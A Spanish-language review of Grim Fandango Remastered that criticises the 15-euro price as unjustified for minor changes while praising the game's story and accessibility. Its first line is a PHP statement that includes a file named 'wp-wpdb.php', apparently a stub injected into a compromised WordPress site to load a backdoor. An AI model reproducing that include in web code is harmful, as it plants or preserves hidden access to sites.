if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Grim Fandango Remastered – La Fortaleza de LeChuck

Análisis Grim Fandango Remastered

Grim Fandango es una de las mejores aventuras gráficas de todos los tiempos y, en lo personal, uno de los mejores videojuegos que he tenido la buena suerte de probar, terminar en repetidas ocasiones y por lo tanto, me veía en la obligación de jugar su versión “Remasterizada” no solo con el fin de analizarla sino también con la intención de revivir un clásico. Sin embargo, no puedo dejar de lado cierto escepticismo previo que me hacía pensar que era innecesario una remasterización de un título que ha envejecido como el vino en ciertos aspectos gráficos y que en otros, los modders de PC se encargaron de arreglar (controles, interfaz, ejecución y detalles técnicos) Por lo tanto decidí esperar y ver el precio con el que partía la nueva versión de la reconocida aventura de LucasArts y que el buen Tim Schafer vendía de nuevo con una sonrisa en la gran variedad de eventos a los que ha sido invitado. ¿Logró superar mis expectativas Grim Fandango Remastered?

grim-fandango-remastered

Debo decir que la sorpresa que me llevé al hablar de Grim Fandango Remasterizado no fue sus cambios, ni siquiera los cambios mínimos que ya auguraba días antes de su estreno, fue su precio el que me sorprendió, QUINCE euros en la tienda de Steam por una versión que sostiene su interés en base a los comentarios del equipo original de desarrollo es una lamentable sorpresa, pues los cambios finales no justifican tal gasto, de hecho, el mismo juego se encarga de demostrarte que a nivel gráfico es exactamente el mismo salvo algunas sombras, el modelado de los personajes y poco más (digo esto pues hay un botón que nos permite visualizar el escenario sin sombras dinámicas o altas resoluciones, es decir como la versión original) Hay un cambio en el sonido y la banda sonora que se encuentra reconstruida para que se escuche mejor, además, los controles al fin son factibles en ratón y por alguna razón el tedioso trámite de entrar al inventario de Manny y observar todos los objetos antes de encontrar el que quieres sigue estando presente (quizás como acto de nostalgia deliberado) Nota aparte: Esta nueva versión cuenta con logros variados y mayormente lineales que para los jugadores que amen los easter eggs será entretenido como mucho.

Sin embargo, me gustaría recordar el hecho obvio: No es un remake, no esperaba menos de la difusa etiqueta “Remasterizado” y de hecho, los numerosos comentarios de desarrollador (que todo fan de la aventura gráfica amará) son suficientes para justificar la existencia de esta versión mas no su precio final en tienda. Es inconcebible que un título que apenas tiene cambios con respecto a la versión original con mods GRATUITOS tenga un precio injustificado en toda la extensión de la palabra y que busque llamar al fanático nostálgico de LucasArts que pica con rapidez a pocas horas de su salida, quizás se deba a la licencia que ahora es propiedad de Disney, como sea, recomiendo esperar a rebajas u ofertas para comprarlo, de ningún modo espero que alguien tras leer esta crítica vaya dispuesto a gastar quince euros en un videojuego que tiene la apariencia finalizada de un mod gratuito de fanáticos.

grim-fandango-remastered2

A pesar de todo lo anterior, y aprovechando que este análisis está ocupando un lugar en el espacio y la lectura de un espectador ansioso por saber si debe gastar o no su dinero, y después de haber recomendado esperar a una cuantiosa rebaja de precio, quiero señalar un punto fuerte de Grim Fandango Remasterizado: Accesibilidad. Grim Fandango nació en 1998 de las manos de LucasArts, un título que eclipsó al resto de la industria y se posiciona siempre entre la lista de los fanáticos a los videojuegos pero que el paso del tiempo se ha encargado (como sucede a todos los títulos, películas, series, música…) de desaparecer progresivamente de la visión publica. Los nuevos jugadores encontrarían difícil siquiera adquirir Grim Fandango hasta hoy, y ya no hay excusa para no comprar una de las mejores aventuras de todos los tiempos.

Por lo tanto, aprovecharé este lugar para darle un análisis en condiciones que acompañe a la versión remasterizada en su función vital: Vender el juego a los nuevos jugadores, convencerlos de que vale la pena regresar en la máquina del tiempo para jugar a títulos que ellos nunca vislumbraron con sus propios ojos y que gracias a esta versión pone al alcance de todos un título NECESARIO en cada memoria de jugador. Concluyendo: ¿Qué es Grim Fandango? ¿Por qué alguien que nunca ha jugado a Grim Fandango debería comprarlo?

Grim Fandango, como todas las aventuras inmortales de LucasArts, nos transporta a un mundo mágico y distinto al nuestro, a un escenario trágico y la alegoría del mito mexicano hacia el mundo de los muerto, el octavo círculo del infierno donde nuestro singular personaje se encuentra encerrado por razones que no logra recordar y bajo mandato divino se encuentra en el Ministerio de la Muerte, el lugar donde los burócratas como él se encargan de venderle pólizas de viaje al cielo o al eterno descanso a almas que tuvieron un mejor “currículum” mientras estaban vivos. Encarnamos a Manny Calavera, un sarcástico agente de la muerte y recolector de almas que ve su trabajo infructuoso ante la escasez de buenos clientes y que un día cualquiera decide poner fin a su fracaso como empleado saliendo a buscar almas mejores que cosechar y lograr cumplir su objetivo vital para poder largarse de ese infierno. Es aquí donde el jugador descubre una trama de egoísmo, corrupción, rivalidades, romance y, sobre todo, humor negro. Todo lo anterior dibujado con mimo y alegoría en escenarios variopintos, preciosistas y detallados al máximo.

grim-fandango-remastered3

Grim Fandango no es una aventura cualquiera, fue una de las primeras en ser 3D de la mano de LucasArts y todo un salto tecnológico en un género que durante los 90s vio su edad dorada y tuvo su cierre con una de las mejores aventuras gráficas de la historia, que no solo se ve influenciada por su propio género a la hora de contar historias, el mismo Manny Calavera es un personaje carismático que bebe completamente del cine, los diálogos se ven influenciados por clásicos tales como Casablanca o Lo que el viento se llevó, frases con constante doble sentido y detalles personales de cada personaje en el mundo que le rodea, con momentos inolvidables como la búsqueda incansable de Mercedes (los jugadores clásicos lo entenderán) y con momentos sentimentales que marcaron nuestra vida y recuerdos (los que hayan vivido el inmenso final de Grim Fandango lo entenderán) El título es un compendio de historias entrelazadas con la vida de Manny Calavera, desde personajes con estilo revolucionario como Salvador, hasta inocencia demoníaca de Glottis, todos se cruzarán en el camino de un egoísta pero divertido personaje principal que de repente se ve sumergido en una trama fangosa y desternillante que comprende uno de los mejores videojuegos de todos los tiempos y, quizás, uno de los más originales que ha visto esta industria.

Entonces, ¿recomiendo esta remasterización? Sí, en ofertas y no en el precio de salida, y a pesar de esta condición, agradezco enormemente la posibilidad que tienen los nuevos jugadores para hacerse con una de las obras maestra de la industria y no hay excusa alguna para perderse el reestreno de una obra magna de los videojuegos tanto si eres fan del juego original como si eres alguien poco entendido con las aventuras gráficas. Lamentablemente, la avaricia y poco tino a la hora de escoger el precio de venta ha desembocado en números abusivos y que no justifican los pocos cambios dentro del juego. Una buena remasterización -que no remake- pero un horrible acto desleal donde Double Fine nos vende “Lo mismo y poco más” pero que sirve para empujar al jugador nuevo a probar Grim Fandango, eso sí, con las santas rebajas de Steam de fondo.

GRIM FANDANGO ya está disponible en PS4, VITA Y PC (Windows, Mac OSX y Linux), te puedes hacer con el al mejor precio aquí.

Por RazorKaen

Jugador clásico que no ha salido de PC desde la primera infancia, cabalgo robot escorpiones gigantes mientras la industria avanza. Soy crítico destructivo y alcalde de alguna ciudad del Sim City, rolero de toda la vida y fanático de los shooter clásicos.